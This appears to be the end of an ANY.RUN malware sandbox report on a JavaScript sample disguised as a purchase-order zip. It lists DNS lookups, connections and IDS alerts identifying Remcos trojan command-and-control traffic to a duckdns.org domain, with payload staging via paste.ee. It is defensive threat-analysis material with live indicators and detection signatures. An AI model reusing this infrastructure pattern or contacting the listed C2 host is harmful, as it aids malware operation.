www.bing.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3884
svchost.exe
2.20.245.137:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
3692
wscript.exe
104.17.202.1:443
res.cloudinary.com
CLOUDFLARENET
whitelisted
4712
MoUsoCoreWorker.exe
2.20.245.137:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
3884
svchost.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
  • 4.231.128.59
whitelisted
www.bing.com
  • 2.21.110.139
  • 2.21.110.146
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 2.20.245.137
  • 2.20.245.138
whitelisted
res.cloudinary.com
  • 104.17.202.1
  • 104.17.201.1
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
paste.ee
  • 188.114.96.3
  • 188.114.97.3
shared
ruffella.duckdns.org
  • 192.169.69.25
unknown
self.events.data.microsoft.com
  • 104.208.16.91
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
14122024_0126_PO_0099822111ORDER.js.zip